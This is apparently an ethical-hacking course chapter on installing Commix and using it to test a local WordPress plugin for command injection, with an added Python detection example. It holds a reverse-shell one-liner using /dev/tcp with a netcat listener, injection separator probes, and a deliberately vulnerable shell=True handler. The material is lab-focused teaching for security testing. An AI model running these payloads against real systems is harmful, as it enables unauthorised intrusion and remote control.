# Commix for Ethical Hacking: A Complete Guide
## Section 5: Mastering Commix
Welcome to the final section of our course on Commix, an open-source tool that automates the detection and exploitation of OS command injection vulnerabilities in web applications. In this section we cover the installation and configuration of Commix on Kali Linux, then walk through its usage step by step against a local test target, with technical explanations and command examples focused on WordPress scenarios.
### 5.1 Installation and Configuration on Kali Linux
**Prerequisites:**
Before installing, make sure your Kali Linux system is up to date. Open a terminal and run:
```bash
sudo apt update && sudo apt upgrade -y
```
**Installing Commix:**
Commix is packaged in the Kali Linux repositories (`sudo apt install commix`). If you want the latest development version from the GitHub repository instead, follow these steps:
1. **Clone the Commix repository:**
```bash
git clone https://github.com/commixproject/commix.git
```
2. **Navigate to the Commix directory:**
```bash
cd commix
```
3. **Install required dependencies:**
Commix runs on Python 3. Install the interpreter and pip, then any requirements listed in the checkout:
```bash
sudo apt install python3 python3-pip
pip3 install -r requirements.txt
```
4. **Make Commix executable:**
```bash
chmod +x commix.py
```
5. **Run Commix:**
You can now execute Commix. Printing the option list is a quick check that the install works:
```bash
python3 commix.py -h
```
### 5.2 Step-by-Step Usage
Commix can test GET parameters, POST data, cookies and HTTP headers using several injection techniques (results-based, dynamic code evaluation, time-based blind and file-based semi-blind). Here we cover how to use it against a sample vulnerable WordPress installation.
**Setting Up a Vulnerable WordPress Instance:**
If you do not have a vulnerable instance to test, you can practise on a deliberately vulnerable application such as DVWA (which ships a command injection exercise) or OWASP Juice Shop. For this walkthrough we use a WordPress site hosted locally.
1. **Install WordPress Locally:**
Use XAMPP or a LAMP stack to set up WordPress, following the official installation guide if needed.
2. **Add a Vulnerable Plugin:**
To simulate command injection, install a plugin that passes user-supplied input to PHP, such as the "Exec PHP" plugin, which evaluates arbitrary PHP code entered through the WordPress admin interface. Note that this is a deliberate code-execution feature rather than an accidental injection bug, and because it lives under `wp-admin` every request to it must carry a valid administrator session cookie; Commix can send that cookie with its `--cookie` option.
### 5.3 Performing a Command Injection Attack
Once your WordPress instance is set up and the vulnerable plugin is installed, let's begin the attack.
#### Basic Command Injection with Commix
1. **Identify the Injection Point:**
Assume that the "Exec PHP" plugin accepts a `code` parameter through a specific endpoint, e.g. `http://localhost/wordpress/wp-admin/admin.php?page=exec-php`, and that whatever is submitted there ends up in a shell command. Confirm the exact parameter name and HTTP method by submitting a request through the browser and inspecting it; Commix only injects into parameters you tell it about.
2. **Use Commix to Test the Parameter:**
```bash
python3 commix.py --url "http://localhost/wordpress/wp-admin/admin.php?page=exec-php" --data "code=whoami"
```
**Explanation:**
- `--url` specifies the target URL.
- `--data` supplies the POST body, here the parameter `code` with the base value `whoami`. Commix does not simply submit this value: it appends its own probes to it (a command separator such as `;`, `|` or `&&` followed by a command whose output or delay it can recognise) and compares the responses to decide whether the parameter reaches a shell. Because this page sits under `wp-admin`, add `--cookie "<your WordPress login cookie>"` so the requests are made in an authenticated session; without it WordPress answers with the login page and nothing is tested.
3. **Interpreting the Output:**
If Commix confirms the injection it reports the technique and the working payload, then offers an interactive pseudo-shell (a single command can also be run non-interactively with `--os-cmd`). Running `whoami` through that shell typically returns:
```
www-data
```
This is the account the web server runs as, so injected commands execute with the web server's permissions rather than root.
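To make concrete what Commix is doing when it tests a parameter, here is an added Python example (not part of this guide or of the Commix code base) that simulates the core of its results-based technique against two constructed handlers: one that concatenates the parameter into a shell command, as the plugin endpoint above is assumed to do, and one hardened with an allow-list and an argument list. The handlers, the marker format and the separator list are this example's own assumptions, not Commix's.

```python
import re
import secrets
import subprocess
from typing import Callable, Optional


def vulnerable_lookup(name: str) -> str:
    """Constructed vulnerable handler: the request parameter is concatenated
    into a command string that is handed to /bin/sh, so shell metacharacters
    in `name` are interpreted. This is the bug class Commix looks for."""
    command = "echo Hello " + name
    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout


def hardened_lookup(name: str) -> str:
    """Hardened handler: an allow-list on the input and an argument list with
    no shell, so the value can never become a second command."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", name):
        return "invalid name\n"
    return subprocess.run(["echo", "Hello", name], capture_output=True, text=True).stdout


# Separators a shell accepts between two commands; Commix tries a longer list.
SEPARATORS = [";", "|", "&&", "\n"]


def detect_command_injection(handler: Callable[[str], str],
                             base_value: str = "world") -> Optional[str]:
    """Results-based probe: append `<sep>echo <marker>` to the normal value and
    look for the marker in the response. Returns the first working separator,
    or None if none of them executed.

    A random marker rather than a fixed string keeps pages that merely echo
    the submitted value from being reported as vulnerable."""
    marker = secrets.token_hex(8)
    for sep in SEPARATORS:
        response = handler(f"{base_value}{sep}echo {marker}")
        reflected = f"echo {marker}" in response        # input printed back, not executed
        executed = re.search(rf"^{marker}$", response, re.MULTILINE) is not None
        if executed and not reflected:
            return sep
    return None


if __name__ == "__main__":
    for label, handler in (("vulnerable", vulnerable_lookup), ("hardened", hardened_lookup)):
        sep = detect_command_injection(handler)
        print(f"{label}: {'injectable via ' + repr(sep) if sep else 'no injection found'}")
```

The check distinguishes execution from reflection: a page that prints the submitted string back contains the literal `echo <marker>`, while a page that ran it contains only the marker on a line of its own. Commix adds time-based and file-based probes for cases where nothing is reflected at all.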
### 5.4 Advanced Usage and Features
Commix offers several options that are useful in a real engagement:
#### 5.4.1 Using Proxies
To route Commix's traffic through an intercepting proxy such as Burp Suite or OWASP ZAP, so that you can inspect and replay every payload it sends, use the `--proxy` flag. The example assumes the proxy is listening on the usual local port 8080:
```bash
python3 commix.py --url "http://localhost/wordpress/wp-admin/admin.php?page=exec-php" --data "code=whoami" --proxy "http://127.0.0.1:8080"
```
A local proxy gives you visibility, not anonymity: the requests still leave your machine from your own address unless the proxy itself forwards them elsewhere.
#### 5.4.2 Specifying User-Agent
By default Commix sends its own tool-identifying `User-Agent` string, which a WAF or a simple request filter may block. Use the `--user-agent` flag to send a browser-like value instead (`--random-agent` picks one for you):
```bash
python3 commix.py --url "http://localhost/wordpress/wp-admin/admin.php?page=exec-php" --data "code=whoami" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
```
### 5.5 Real-World Use Cases
#### Use Case 1: Gaining Shell Access
Commix not only executes single commands but can also be used to obtain a reverse shell, which is often the pivot point of a penetration test. Start a listener on your machine first (for example `nc -lvnp YOUR_PORT`), then send the payload.
1. **Reverse Shell Command via Commix:**
```bash
python3 commix.py --url "http://localhost/wordpress/wp-admin/admin.php?page=exec-php" --data "code=system('bash -c \"bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1\"')"
```
Three levels of quoting are in play: the outer double quotes belong to your shell, the single quotes to PHP's `system()` call, and the escaped inner double quotes to the argument of `bash -c`. Replace `YOUR_IP` and `YOUR_PORT` with the listener's address and port. If Commix has already confirmed an injection point, its built-in `--reverse-tcp` option (or `--os-cmd` with the same one-liner) achieves the same result without hand-crafting the quoting.